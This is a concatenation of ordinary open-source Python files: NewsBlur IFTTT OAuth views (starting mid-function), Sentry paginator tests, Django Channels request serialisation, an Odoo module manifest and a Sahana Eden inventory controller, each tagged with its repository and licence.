    user = request.user
    body = request.body_json
    fields = body.get('actionFields')
    story_url = urlnorm.normalize(fields['story_url'])
    story_content = fields.get('story_content', "")
    story_title = fields.get('story_title', "")
    story_author = fields.get('story_author', "")
    user_tags = fields.get('user_tags', "")
    story = None
    logging.user(request.user, "~FBFinding feed (api_save_new_story): %s" % story_url)
    original_feed = Feed.get_feed_from_url(story_url)
    if not story_content or not story_title:
        # Fill in missing pieces by fetching the original page text.
        ti = TextImporter(feed=original_feed, story_url=story_url, request=request)
        original_story = ti.fetch(return_document=True)
        if original_story:
            story_url = original_story['url']
            if not story_content:
                story_content = original_story['content']
            if not story_title:
                story_title = original_story['title']
    try:
        story_db = {
            "user_id": user.pk,
            "starred_date": datetime.datetime.now(),
            "story_date": datetime.datetime.now(),
            "story_title": story_title or '[Untitled]',
            "story_permalink": story_url,
            "story_guid": story_url,
            "story_content": story_content,
            "story_author_name": story_author,
            "story_feed_id": original_feed and original_feed.pk or 0,
            "user_tags": [tag for tag in user_tags.split(',')]
        }
        story = MStarredStory.objects.create(**story_db)
        logging.user(request, "~FCStarring by ~SBIFTTT~SN: ~SB%s~SN in ~SB%s" % (story_db['story_title'][:50], original_feed and original_feed))
        MStarredStoryCounts.count_for_user(user.pk)
    except OperationError:
        # Duplicate star (unique index) -- already saved, nothing to do.
        logging.user(request, "~FCAlready starred by ~SBIFTTT~SN: ~SB%s" % (story_db['story_title'][:50]))
        pass
    return {"data": [{
        "id": story and story.id,
        "url": story and story.story_permalink
    }]}
@oauth_login_required
@json.json_view
def api_save_new_subscription(request):
    """IFTTT action: subscribe the user to a feed URL in a given folder."""
    fields = request.body_json.get('actionFields')
    url = urlnorm.normalize(fields['url'])
    folder = fields['folder']
    if folder == "Top Level":
        # " " is the internal name for the top-level pseudo-folder.
        folder = " "
    code, message, us = UserSubscription.add_subscription(
        user=request.user,
        feed_address=url,
        folder=folder,
        bookmarklet=True
    )
    logging.user(request, "~FRAdding URL from ~FC~SBIFTTT~SN~FR: ~SB%s (in %s)" % (url, folder))
    if us and us.feed:
        # Report the canonical feed address rather than the submitted URL.
        url = us.feed.feed_address
    return {"data": [{
        "id": us and us.feed_id,
        "url": url,
    }]}
| manderson23/NewsBlur | apps/oauth/views.py | Python | mit | 34,202 |
from __future__ import absolute_import
from datetime import timedelta
from django.utils import timezone
from unittest import TestCase as SimpleTestCase
from sentry.api.paginator import (
BadPaginationError,
Paginator,
DateTimePaginator,
OffsetPaginator,
SequencePaginator,
GenericOffsetPaginator,
reverse_bisect_left,
)
from sentry.models import User
from sentry.testutils import TestCase
from sentry.utils.cursors import Cursor
class PaginatorTest(TestCase):
    """Tests for the base cursor `Paginator`."""
    # Subclasses can point this at another paginator implementation.
    cls = Paginator
    def test_max_limit(self):
        # max_limit caps the effective page size regardless of the
        # requested limit.
        self.create_user("foo@example.com")
        self.create_user("bar@example.com")
        self.create_user("baz@example.com")
        queryset = User.objects.all()
        paginator = self.cls(queryset, "id", max_limit=10)
        result = paginator.get_result(limit=2, cursor=None)
        assert len(result) == 2
        paginator = self.cls(queryset, "id", max_limit=1)
        result = paginator.get_result(limit=2, cursor=None)
        assert len(result) == 1
    def test_count_hits(self):
        # count_hits reports the number of matching rows, bounded by the
        # given maximum.
        self.create_user("foo@example.com")
        self.create_user("bar@example.com")
        queryset = User.objects.filter(email="foo@example.com")
        paginator = self.cls(queryset, "id")
        result = paginator.count_hits(1000)
        assert result == 1
        queryset = User.objects.all()
        paginator = self.cls(queryset, "id")
        result = paginator.count_hits(1000)
        assert result == 2
        queryset = User.objects.none()
        paginator = self.cls(queryset, "id")
        result = paginator.count_hits(1000)
        assert result == 0
        queryset = User.objects.all()
        paginator = self.cls(queryset, "id")
        result = paginator.count_hits(1)
        assert result == 1
    def test_prev_emptyset(self):
        # A prev-cursor taken from an empty result set must still pick up
        # rows created afterwards, and paging back again yields nothing.
        queryset = User.objects.all()
        paginator = self.cls(queryset, "id")
        result1 = paginator.get_result(limit=1, cursor=None)
        res1 = self.create_user("foo@example.com")
        result2 = paginator.get_result(limit=1, cursor=result1.prev)
        assert len(result2) == 1, (result2, list(result2))
        assert result2[0] == res1
        result3 = paginator.get_result(limit=1, cursor=result2.prev)
        assert len(result3) == 0, (result3, list(result3))
class OffsetPaginatorTest(TestCase):
    """Tests for ``OffsetPaginator``, which pages by absolute row offset."""
    # offset paginator does not support dynamic limits on is_prev
    def test_simple(self):
        """Walk forward through three rows one at a time, then back via prev."""
        res1 = self.create_user("foo@example.com")
        res2 = self.create_user("bar@example.com")
        res3 = self.create_user("baz@example.com")
        queryset = User.objects.all()
        paginator = OffsetPaginator(queryset, "id")
        result1 = paginator.get_result(limit=1, cursor=None)
        assert len(result1) == 1, result1
        assert result1[0] == res1
        assert result1.next
        assert not result1.prev
        result2 = paginator.get_result(limit=1, cursor=result1.next)
        assert len(result2) == 1, (result2, list(result2))
        assert result2[0] == res2
        assert result2.next
        assert result2.prev
        result3 = paginator.get_result(limit=1, cursor=result2.next)
        assert len(result3) == 1, result3
        assert result3[0] == res3
        assert not result3.next
        assert result3.prev
        # Walking past the end yields an empty page that can still go back
        result4 = paginator.get_result(limit=1, cursor=result3.next)
        assert len(result4) == 0, result4
        assert not result4.next
        assert result4.prev
        result5 = paginator.get_result(limit=1, cursor=result4.prev)
        assert len(result5) == 1, result5
        assert result5[0] == res3
        assert not result5.next
        assert result5.prev
    def test_order_by_multiple(self):
        """A tuple order_by sorts by each field in turn (is_active, then id)."""
        res1 = self.create_user("foo@example.com")
        self.create_user("bar@example.com")
        res3 = self.create_user("baz@example.com")
        queryset = User.objects.all()
        paginator = OffsetPaginator(queryset, "id")
        result = paginator.get_result(limit=1, cursor=None)
        assert len(result) == 1, result
        assert result[0] == res1
        assert result.next
        assert not result.prev
        # Deactivated user sorts first when ordering by (is_active, id)
        res3.update(is_active=False)
        paginator = OffsetPaginator(queryset, ("is_active", "id"))
        result = paginator.get_result(limit=1, cursor=None)
        assert len(result) == 1, result
        assert result[0] == res3
        assert result.next
        assert not result.prev
        result = paginator.get_result(limit=1, cursor=result.next)
        assert len(result) == 1, (result, list(result))
        assert result[0] == res1
        assert result.next
        assert result.prev
    def test_max_offset(self):
        """Requests beyond ``max_offset`` raise ``BadPaginationError``."""
        self.create_user("foo@example.com")
        self.create_user("bar@example.com")
        self.create_user("baz@example.com")
        queryset = User.objects.all()
        paginator = OffsetPaginator(queryset, max_offset=10)
        result1 = paginator.get_result(cursor=None)
        assert len(result1) == 3, result1
        paginator = OffsetPaginator(queryset, max_offset=0)
        with self.assertRaises(BadPaginationError):
            paginator.get_result()
class DateTimePaginatorTest(TestCase):
    """Tests for ``DateTimePaginator``, which pages on a datetime column."""
    def test_ascending(self):
        """Page forward and back over rows ordered by ascending join date."""
        joined = timezone.now()
        # The DateTime pager only has accuracy up to 1000th of a second.
        # Everythng can't be added within less than 10 microseconds of each
        # other. This is handled by the pager (see test_rounding_offset), but
        # this case shouldn't rely on it.
        res1 = self.create_user("foo@example.com", date_joined=joined)
        res2 = self.create_user("bar@example.com", date_joined=joined + timedelta(seconds=1))
        res3 = self.create_user("baz@example.com", date_joined=joined + timedelta(seconds=2))
        res4 = self.create_user("qux@example.com", date_joined=joined + timedelta(seconds=3))
        queryset = User.objects.all()
        paginator = DateTimePaginator(queryset, "date_joined")
        result1 = paginator.get_result(limit=2, cursor=None)
        assert len(result1) == 2, result1
        assert result1[0] == res1
        assert result1[1] == res2
        assert result1.next
        assert not result1.prev
        result2 = paginator.get_result(limit=2, cursor=result1.next)
        assert len(result2) == 2, result2
        assert result2[0] == res3
        assert result2[1] == res4
        assert not result2.next
        assert result2.prev
        # Going back with a smaller limit re-slices the earlier window
        result3 = paginator.get_result(limit=1, cursor=result2.prev)
        assert len(result3) == 1, result3
        assert result3[0] == res2
        assert result3.next
        assert result3.prev
        result4 = paginator.get_result(limit=1, cursor=result3.prev)
        assert len(result4) == 1, result4
        assert result4[0] == res1
        assert result4.next
        assert not result4.prev
    def test_descending(self):
        """A leading ``-`` on the field name pages newest-first."""
        joined = timezone.now()
        res1 = self.create_user("foo@example.com", date_joined=joined)
        res2 = self.create_user("bar@example.com", date_joined=joined + timedelta(seconds=1))
        res3 = self.create_user("baz@example.com", date_joined=joined + timedelta(seconds=2))
        queryset = User.objects.all()
        paginator = DateTimePaginator(queryset, "-date_joined")
        result1 = paginator.get_result(limit=1, cursor=None)
        assert len(result1) == 1, result1
        assert result1[0] == res3
        assert result1.next
        assert not result1.prev
        result2 = paginator.get_result(limit=2, cursor=result1.next)
        assert len(result2) == 2, result2
        assert result2[0] == res2
        assert result2[1] == res1
        assert not result2.next
        assert result2.prev
        result3 = paginator.get_result(limit=2, cursor=result2.prev)
        assert len(result3) == 1, result3
        assert result3[0] == res3
        assert result3.next
        assert not result3.prev
    def test_prev_descending_with_new(self):
        """The prev page of a descending pager surfaces rows created later."""
        joined = timezone.now()
        res1 = self.create_user("foo@example.com", date_joined=joined)
        res2 = self.create_user("bar@example.com", date_joined=joined + timedelta(seconds=1))
        queryset = User.objects.all()
        paginator = DateTimePaginator(queryset, "-date_joined")
        result1 = paginator.get_result(limit=10, cursor=None)
        assert len(result1) == 2, result1
        assert result1[0] == res2
        assert result1[1] == res1
        # Two newer rows created after the first page was fetched
        res3 = self.create_user("baz@example.com", date_joined=joined + timedelta(seconds=2))
        res4 = self.create_user("qux@example.com", date_joined=joined + timedelta(seconds=3))
        result2 = paginator.get_result(limit=10, cursor=result1.prev)
        assert len(result2) == 2, result2
        assert result2[0] == res4
        assert result2[1] == res3
        result3 = paginator.get_result(limit=10, cursor=result2.prev)
        assert len(result3) == 0, result3
        result4 = paginator.get_result(limit=10, cursor=result1.next)
        assert len(result4) == 0, result4
    def test_rounding_offset(self):
        """Rows closer together than the pager's resolution are split via offsets."""
        joined = timezone.now()
        res1 = self.create_user("foo@example.com", date_joined=joined)
        res2 = self.create_user("bar@example.com", date_joined=joined + timedelta(microseconds=1))
        res3 = self.create_user("baz@example.com", date_joined=joined + timedelta(microseconds=2))
        res4 = self.create_user("qux@example.com", date_joined=joined + timedelta(microseconds=3))
        queryset = User.objects.all()
        paginator = DateTimePaginator(queryset, "date_joined")
        result1 = paginator.get_result(limit=3, cursor=None)
        assert len(result1) == 3, result1
        assert result1[0] == res1
        assert result1[1] == res2
        assert result1[2] == res3
        result2 = paginator.get_result(limit=10, cursor=result1.next)
        assert len(result2) == 1, result2
        assert result2[0] == res4
        result3 = paginator.get_result(limit=2, cursor=result2.prev)
        assert len(result3) == 2, result3
        assert result3[0] == res2
        assert result3[1] == res3
        result4 = paginator.get_result(limit=1, cursor=result3.prev)
        assert len(result4) == 1, result4
        assert result4[0] == res1
        result5 = paginator.get_result(limit=10, cursor=result4.prev)
        assert len(result5) == 0, list(result5)
    def test_same_row_updated(self):
        """A row whose sort value moves forward reappears on the prev page."""
        joined = timezone.now()
        res1 = self.create_user("foo@example.com", date_joined=joined)
        queryset = User.objects.all()
        paginator = DateTimePaginator(queryset, "-date_joined")
        result1 = paginator.get_result(limit=3, cursor=None)
        assert len(result1) == 1, result1
        assert result1[0] == res1
        # Prev page should return no results
        result2 = paginator.get_result(limit=3, cursor=result1.prev)
        assert len(result2) == 0, result2
        # If the same row has an updated join date then it should
        # show up on the prev page
        res1.update(date_joined=joined + timedelta(seconds=1))
        result3 = paginator.get_result(limit=3, cursor=result1.prev)
        assert len(result3) == 1, result3
        assert result3[0] == res1
        # Make sure updates work as expected with extra rows
        res1.update(date_joined=res1.date_joined + timedelta(seconds=1))
        res2 = self.create_user(
            "bar@example.com", date_joined=res1.date_joined + timedelta(seconds=1)
        )
        res3 = self.create_user(
            "baz@example.com", date_joined=res1.date_joined + timedelta(seconds=2)
        )
        res4 = self.create_user(
            "bat@example.com", date_joined=res1.date_joined + timedelta(seconds=3)
        )
        result4 = paginator.get_result(limit=1, cursor=result3.prev)
        assert len(result4) == 1, result4
        assert result4[0] == res1
        result5 = paginator.get_result(limit=3, cursor=result3.prev)
        assert len(result5) == 3, result5
        assert result5[0] == res3
        assert result5[1] == res2
        assert result5[2] == res1
        result6 = paginator.get_result(limit=3, cursor=result5.prev)
        assert len(result6) == 1, result6
        assert result6[0] == res4
        res4.update(date_joined=res4.date_joined + timedelta(seconds=1))
        result7 = paginator.get_result(limit=3, cursor=result6.prev)
        assert len(result7) == 1, result7
        assert result7[0] == res4
def test_reverse_bisect_left():
    """
    ``reverse_bisect_left`` finds the leftmost insertion point for a value
    in a sequence sorted in *descending* order (mirror of ``bisect_left``).
    """
    # Empty sequence: insertion point is always 0.
    assert reverse_bisect_left([], 0) == 0
    # For each descending sequence, map candidate value -> expected index.
    # Values below the minimum insert at the end, values above the maximum
    # at the front; for ties the *leftmost* slot of the equal run wins.
    table = [
        ([1], [(-1, 1), (0, 1), (1, 0), (2, 0)]),
        ([2, 1], [(-1, 2), (0, 2), (1, 1), (2, 0), (3, 0)]),
        ([3, 2, 1], [(-1, 3), (0, 3), (1, 2), (2, 1), (3, 0), (4, 0)]),
        ([4, 3, 2, 1], [(-1, 4), (0, 4), (1, 3), (2, 2), (3, 1), (4, 0), (5, 0)]),
        ([1, 1], [(0, 2), (1, 0), (2, 0)]),
        ([2, 1, 1], [(0, 3), (1, 1), (2, 0)]),
        ([2, 2, 1], [(0, 3), (1, 2), (2, 0)]),
    ]
    for sequence, expectations in table:
        for value, expected in expectations:
            assert reverse_bisect_left(sequence, value) == expected, (sequence, value)
    # An oversized ``hi`` bound must not break the search.
    assert reverse_bisect_left([3, 2, 1], 2, hi=10) == 1
class SequencePaginatorTestCase(SimpleTestCase):
    """Tests for ``SequencePaginator`` over in-memory (score, value) pairs."""
    def test_empty_results(self):
        """An empty sequence yields empty pages with sentinel cursors."""
        paginator = SequencePaginator([])
        result = paginator.get_result(5)
        assert list(result) == []
        assert result.prev == Cursor(0, 0, True, False)
        assert result.next == Cursor(0, 0, False, False)
        paginator = SequencePaginator([], reverse=True)
        result = paginator.get_result(5)
        assert list(result) == []
        assert result.prev == Cursor(0, 0, True, False)
        assert result.next == Cursor(0, 0, False, False)
    def test_ascending_simple(self):
        """Forward/backward paging over ten distinct ascending scores."""
        paginator = SequencePaginator([(i, i) for i in range(10)], reverse=False)
        result = paginator.get_result(5)
        assert list(result) == [0, 1, 2, 3, 4]
        assert result.prev == Cursor(0, 0, True, False)
        assert result.next == Cursor(5, 0, False, True)
        result = paginator.get_result(5, result.next)
        assert list(result) == [5, 6, 7, 8, 9]
        assert result.prev == Cursor(5, 0, True, True)
        assert result.next == Cursor(9, 1, False, False)
        result = paginator.get_result(5, result.prev)
        assert list(result) == [0, 1, 2, 3, 4]
        assert result.prev == Cursor(0, 0, True, False)
        assert result.next == Cursor(5, 0, False, True)
        # A cursor past all scores yields an empty page
        result = paginator.get_result(5, Cursor(100, 0, False))
        assert list(result) == []
        assert result.prev == Cursor(9, 1, True, True)
        assert result.next == Cursor(9, 1, False, False)
    def test_descending_simple(self):
        """Same walk as above but with ``reverse=True`` (highest score first)."""
        paginator = SequencePaginator([(i, i) for i in range(10)], reverse=True)
        result = paginator.get_result(5)
        assert list(result) == [9, 8, 7, 6, 5]
        assert result.prev == Cursor(9, 0, True, False)
        assert result.next == Cursor(4, 0, False, True)
        result = paginator.get_result(5, result.next)
        assert list(result) == [4, 3, 2, 1, 0]
        assert result.prev == Cursor(4, 0, True, True)
        assert result.next == Cursor(0, 1, False, False)
        result = paginator.get_result(5, result.prev)
        assert list(result) == [9, 8, 7, 6, 5]
        assert result.prev == Cursor(9, 0, True, False)
        assert result.next == Cursor(4, 0, False, True)
        result = paginator.get_result(5, Cursor(-10, 0, False))
        assert list(result) == []
        assert result.prev == Cursor(0, 1, True, True)
        assert result.next == Cursor(0, 1, False, False)
    def test_ascending_repeated_scores(self):
        """Equal scores are disambiguated by the cursor's offset component."""
        paginator = SequencePaginator([(1, i) for i in range(10)], reverse=False)
        result = paginator.get_result(5)
        assert list(result) == [0, 1, 2, 3, 4]
        assert result.prev == Cursor(1, 0, True, False)
        assert result.next == Cursor(1, 5, False, True)
        result = paginator.get_result(5, result.next)
        assert list(result) == [5, 6, 7, 8, 9]
        assert result.prev == Cursor(1, 5, True, True)
        assert result.next == Cursor(1, 10, False, False)
        result = paginator.get_result(5, result.prev)
        assert list(result) == [0, 1, 2, 3, 4]
        assert result.prev == Cursor(1, 0, True, False)
        assert result.next == Cursor(1, 5, False, True)
        result = paginator.get_result(5, Cursor(100, 0, False))
        assert list(result) == []
        assert result.prev == Cursor(1, 10, True, True)
        assert result.next == Cursor(1, 10, False, False)
    def test_descending_repeated_scores(self):
        """Offset disambiguation also works when paging in reverse."""
        paginator = SequencePaginator([(1, i) for i in range(10)], reverse=True)
        result = paginator.get_result(5)
        assert list(result) == [9, 8, 7, 6, 5]
        assert result.prev == Cursor(1, 0, True, False)
        assert result.next == Cursor(1, 5, False, True)
        result = paginator.get_result(5, result.next)
        assert list(result) == [4, 3, 2, 1, 0]
        assert result.prev == Cursor(1, 5, True, True)
        assert result.next == Cursor(1, 10, False, False)
        result = paginator.get_result(5, result.prev)
        assert list(result) == [9, 8, 7, 6, 5]
        assert result.prev == Cursor(1, 0, True, False)
        assert result.next == Cursor(1, 5, False, True)
        result = paginator.get_result(5, Cursor(-10, 0, False))
        assert list(result) == []
        assert result.prev == Cursor(1, 10, True, True)
        assert result.next == Cursor(1, 10, False, False)
    def test_hits(self):
        """``count_hits=True`` reports the full number of items."""
        n = 10
        paginator = SequencePaginator([(i, i) for i in range(n)])
        assert paginator.get_result(5, count_hits=True).hits == n
class GenericOffsetPaginatorTest(TestCase):
    """Tests for ``GenericOffsetPaginator``, which pages an arbitrary data_fn."""

    def test_simple(self):
        # data_fn receives the paginator's computed offset/limit window
        def fetch(offset=None, limit=None):
            return list(range(offset, limit))

        pager = GenericOffsetPaginator(data_fn=fetch)

        page = pager.get_result(5)
        assert list(page) == [0, 1, 2, 3, 4]
        assert page.prev == Cursor(0, 0, True, False)
        assert page.next == Cursor(0, 5, False, True)

        # The second page only has one row left
        page2 = pager.get_result(5, page.next)
        assert list(page2) == [5]
        assert page2.prev == Cursor(0, 0, True, True)
        assert page2.next == Cursor(0, 10, False, False)
| mvaled/sentry | tests/sentry/api/test_paginator.py | Python | bsd-3-clause | 19,392 |
from django.http import HttpRequest
from django.utils.datastructures import MultiValueDict
from django.http.request import QueryDict
from django.conf import settings
def encode_request(request):
    """
    Encodes a request to JSON-compatible datastructures
    (plain dicts/lists/strings suitable for serialization).
    """
    # TODO: More stuff
    # Drop wsgi.* entries from META: they hold sockets/file handles and
    # other non-serializable WSGI internals.
    meta = {}
    for key, val in request.META.items():
        if not key.startswith("wsgi"):
            meta[key] = val
    return {
        "get": dict(request.GET.lists()),
        "post": dict(request.POST.lists()),
        "cookies": request.COOKIES,
        "meta": meta,
        "path": request.path,
        "path_info": request.path_info,
        "method": request.method,
        "reply_channel": request.reply_channel,
    }
def decode_request(value):
    """
    Decodes a request JSONish value (as produced by ``encode_request``)
    back into an ``HttpRequest`` instance.
    """
    request = HttpRequest()
    # GET/POST need the MultiValueDict semantics of CustomQueryDict
    request.GET = CustomQueryDict(value["get"])
    request.POST = CustomQueryDict(value["post"])
    # The remaining attributes are plain values, restored verbatim
    for attr, key in (("COOKIES", "cookies"),
                      ("META", "meta"),
                      ("path", "path"),
                      ("method", "method"),
                      ("path_info", "path_info"),
                      ("reply_channel", "reply_channel")):
        setattr(request, attr, value[key])
    return request
class CustomQueryDict(QueryDict):
    """
    Custom override of QueryDict that sets things directly.
    """
    def __init__(self, values):
        # Deliberately skip QueryDict.__init__, which expects a raw
        # querystring and enforces immutability; instead populate via
        # MultiValueDict with the already-decoded {key: [values]} mapping.
        MultiValueDict.__init__(self, values)
| octaflop/channels | channels/request.py | Python | bsd-3-clause | 1,366 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# ______ Releasing children from poverty _
# / ____/___ ____ ___ ____ ____ ___________(_)___ ____
# / / / __ \/ __ `__ \/ __ \/ __ `/ ___/ ___/ / __ \/ __ \
# / /___/ /_/ / / / / / / /_/ / /_/ (__ |__ ) / /_/ / / / /
# \____/\____/_/ /_/ /_/ .___/\__,_/____/____/_/\____/_/ /_/
# /_/
# in Jesus' name
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# @author: Cyril Sester, Emanuel Cino
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name': 'LSV-DD Compassion',
    'summary': 'Customize LSV-DD to fit Compassion needs',
    'version': '1.0',
    'license': 'AGPL-3',
    'author': 'Compassion CH',
    'website': 'http://www.compassion.ch',
    'category': 'Other',
    # Modules that must be installed before this one
    'depends': ['l10n_ch_lsv_dd',
                'account_banking_payment_export',
                'contract_compassion'],
    # No external Python libraries required
    'external_dependencies': {},
    # Data files loaded on install/update (views first, then workflow data)
    'data': [
        'view/payment_mode.xml',
        'data/payment_workflow.xml',
    ],
    # No demo data shipped with this module
    'demo': [],
    'active': False,
    'installable': True,
}
| ndtran/compassion-switzerland | lsv_compassion/__openerp__.py | Python | agpl-3.0 | 1,970 |
# -*- coding: utf-8 -*-
# -*- coding: utf-8 -*-
# NOTE(review): the coding declaration above is duplicated; only the first
# occurrence is significant and the second line can be removed.
"""
    Inventory Management

    A module to record inventories of items at a locations (sites),
    including Warehouses, Offices, Shelters & Hospitals
"""
# web2py controller boilerplate: derive the module/resource names from the
# current request, and 404 if this module is disabled in deployment settings
module = request.controller
resourcename = request.function
if not settings.has_module(module):
    raise HTTP(404, body="Module disabled: %s" % module)
# -----------------------------------------------------------------------------
def index():
    """
    Application Home page
    - custom View
    """
    # Load the shelter model so its CRUD strings are available to the view
    s3db.table("cr_shelter", None)
    name_nice = settings.modules[module].name_nice
    response.title = name_nice
    return dict(module_name=name_nice)
# -----------------------------------------------------------------------------
def warehouse():
    """
        RESTful CRUD controller for Warehouses.

        Handles "viewing" redirects from track items, configures the
        component tabs (stock, shipments, staff, requests), filters out
        obsolete warehouses by default, and points the list action
        buttons at the Stock tab.
    """
    # If arriving via a ?viewing=inv_warehousec.<id> link, treat the id
    # as the primary record id
    if "viewing" in request.get_vars:
        viewing = request.get_vars.viewing
        tn, id = viewing.split(".", 1)
        if tn == "inv_warehousec":
            request.args.insert(0, id)
    # CRUD pre-process
    def prep(r):
        # Purpose: per-request field visibility & component filtering
        if r.id:
            r.table.obsolete.readable = r.table.obsolete.writable = True
        if r.component:
            if r.component.name == "inv_item":
                # Filter out items which are already in this inventory
                s3db.inv_prep(r)
                # Remove the Warehouse Name from the list_fields
                list_fields = s3db.get_config("inv_inv_item", "list_fields")
                try:
                    list_fields.remove("site_id")
                    s3db.configure("inv_inv_item", list_fields=list_fields)
                except:
                    pass
            elif r.component.name == "recv" or \
                 r.component.name == "send":
                # Filter out items which are already in this inventory
                s3db.inv_prep(r)
            elif r.component.name == "human_resource":
                # Filter out people which are already staff for this warehouse
                s3base.s3_filter_staff(r)
                # Cascade the organisation_id from the hospital to the staff
                htable = s3db.hrm_human_resource
                htable.organisation_id.default = r.record.organisation_id
                htable.organisation_id.writable = False
            elif r.component.name == "req":
                s3db.req_prep(r)
                if r.method != "update" and r.method != "read":
                    # Hide fields which don't make sense in a Create form
                    # inc list_create (list_fields over-rides)
                    s3db.req_create_form_mods()
        # "show_obsolete" var option can be added (btn?) later to
        # disable this filter
        if r.method in [None, "list"] and \
           not r.vars.get("show_obsolete", False):
            r.resource.add_filter(s3db.inv_warehouse.obsolete != True)
        return True
    s3.prep = prep
    # CRUD post-process
    def postp(r, output):
        # Purpose: rewrite action buttons and drop the add button
        if r.interactive and not r.component and r.method != "import":
            # Change Action buttons to open Stock Tab by default
            read_url = URL(f="warehouse", args=["[id]", "inv_item"])
            update_url = URL(f="warehouse", args=["[id]", "inv_item"])
            s3mgr.crud.action_buttons(r,
                                      read_url=read_url,
                                      update_url=update_url)
        if "add_btn" in output:
            del output["add_btn"]
        return output
    s3.postp = postp
    # CSV import of extra_data targets the inv_item resource instead
    if "extra_data" in request.get_vars:
        resourcename = "inv_item"
    else:
        resourcename = "warehouse"
    csv_stylesheet = "%s.xsl" % resourcename
    output = s3_rest_controller(module, resourcename,
                                rheader=s3db.inv_warehouse_rheader,
                                csv_template = resourcename,
                                csv_stylesheet = csv_stylesheet,
                                # Extra fields for CSV uploads:
                                csv_extra_fields = [
                                    dict(label="Organisation",
                                         field=s3db.org_organisation_id(comment=None))
                                ])
    if "add_btn" in output:
        del output["add_btn"]
    return output
# -----------------------------------------------------------------------------
def supplier():
    """ Organisations REST controller, restricted to Suppliers only """
    get_vars = current.request.get_vars
    # Pre-filter the organisation list by type before delegating
    get_vars["organisation.organisation_type_id$name"] = "Supplier"
    return s3db.org_organisation_controller()
# =============================================================================
def inv_item():
    """
        REST Controller for Stock (inv_inv_item).

        Supports a "Monetization Report" variant (?report=mon), redirects
        track-item "viewing" links to track_movement, and offers a CSV
        import with an optional "replace existing data" mode which deletes
        an organisation's stock records before importing.
    """
    tablename = "inv_inv_item"
    # Load model to be able to override CRUD string(s)
    table = s3db[tablename]
    s3.crud_strings[tablename].msg_list_empty = T("No Stock currently registered")
    if "report" in request.get_vars and \
        request.get_vars.report == "mon":
        # Monetization Report variant: different titles & list columns
        s3.crud_strings[tablename].update(dict(
            title_list = T("Monetization Report"),
            subtitle_list = T("Monetization Details"),
            msg_list_empty = T("No Stock currently registered"),
            title_search = T("Monetization Report"),
            ))
        s3db.configure(tablename,
                       list_fields = ["id",
                                      (T("Donor"), "supply_org_id"),
                                      (T("Items/Description"), "item_id"),
                                      (T("Quantity"), "quantity"),
                                      (T("Unit"), "item_pack_id"),
                                      (T("Unit Value"), "pack_value"),
                                      (T("Total Value"), "total_value"),
                                      (T("Remarks"), "comments"),
                                      "status",
                                      ]
                       )
    else:
        s3db.configure(tablename,
                       insertable=False,
                       list_fields = ["id",
                                      "site_id",
                                      "item_id",
                                      (T("Item Code"), "item_code"),
                                      (T("Category"), "item_category"),
                                      "quantity",
                                      "pack_value",
                                      #(T("Total Value"), "total_value"),
                                      ]
                       )
    # Upload for configuration (add replace option)
    s3.importerPrep = lambda: dict(ReplaceOption=T("Remove existing data before import"))
    # if this url has a viewing track items then redirect to track_movement
    if "viewing" in request.get_vars:
        viewing = request.get_vars.viewing
        tn, id = viewing.split(".", 1)
        if tn == "inv_track_item":
            record = s3db.inv_track_item[id]
            redirect(URL(c = "inv",
                         f = "track_movement",
                         args = [],
                         vars = {"viewing" : "%s.%s" % ("inv_inv_item", record.item_id)}
                         )
                     )
    def prep(r):
        # Group the datatable rows by the second column for plain lists
        if r.method != "search" and r.method != "report":
            s3.dataTable_group = 1
        return True
    s3.prep = prep
    # Import pre-process
    def import_prep(data):
        """
            Deletes all Stock records of the organisation
            before processing a new data import, used for the import_prep
            hook in s3mgr
        """
        request = current.request
        resource, tree = data
        xml = current.xml
        tag = xml.TAG
        att = xml.ATTRIBUTE
        if s3.importerReplace:
            if tree is not None:
                # Find every organisation named in the import file and
                # delete the inv_items of all of its sites
                root = tree.getroot()
                expr = "/%s/%s[@%s='org_organisation']/%s[@%s='name']" % \
                       (tag.root, tag.resource, att.name, tag.data, att.field)
                orgs = root.xpath(expr)
                otable = s3db.org_organisation
                stable = s3db.org_site
                itable = s3db.inv_inv_item
                for org in orgs:
                    org_name = org.get("value", None) or org.text
                    if org_name:
                        try:
                            # Names may arrive JSON-encoded in the XML
                            org_name = json.loads(xml.xml_decode(org_name))
                        except:
                            pass
                    if org_name:
                        query = (otable.name == org_name) & \
                                (stable.organisation_id == otable.id) & \
                                (itable.site_id == stable.id)
                        resource = s3mgr.define_resource("inv", "inv_item", filter=query)
                        ondelete = s3db.get_config("inv_inv_item", "ondelete")
                        resource.delete(ondelete=ondelete, format="xml")
        resource.skip_import = True
    s3mgr.import_prep = import_prep
    # Limit site_id to sites the user has permissions for
    auth.permitted_facilities(table=table,
                              error_msg=T("You do not have permission for any site to add an inventory item."))
    if len(request.args) > 1 and request.args[1] == "track_item":
        # remove CRUD generated buttons in the tabs
        s3db.configure("inv_track_item",
                       create=False,
                       listadd=False,
                       editable=False,
                       deletable=False,
                       )
    output = s3_rest_controller(rheader=s3db.inv_warehouse_rheader,
                                csv_extra_fields = [
                                                    dict(label="Organisation",
                                                         field=s3db.org_organisation_id(comment=None)
                                                         )
                                                    ],
                                pdf_paper_alignment = "Landscape",
                                pdf_table_autogrow = "B",
                                pdf_groupby = "site_id, item_id",
                                pdf_orderby = "expiry_date, supply_org_id",
                                )
    if "add_btn" in output:
        del output["add_btn"]
    return output
# -----------------------------------------------------------------------------
def track_movement():
    """
        REST Controller for track items, read-only, optionally filtered
        to the movements of a single inventory item (?viewing=...).
    """
    table = s3db.inv_track_item
    # Movements are a read-only audit trail
    s3db.configure("inv_track_item",
                   create=False,
                   listadd=False,
                   editable=False,
                   deletable=False,
                   )

    def prep(r):
        # Restrict to movements into or out of the viewed inventory item
        if r.interactive and "viewing" in request.vars:
            dummy, item_id = request.vars.viewing.split(".")
            s3.filter = ((table.send_inv_item_id == item_id) |
                         (table.recv_inv_item_id == item_id))
        return True
    s3.prep = prep

    output = s3_rest_controller("inv", "track_item",
                                rheader=s3db.inv_warehouse_rheader,
                                )
    if "add_btn" in output:
        del output["add_btn"]
    return output
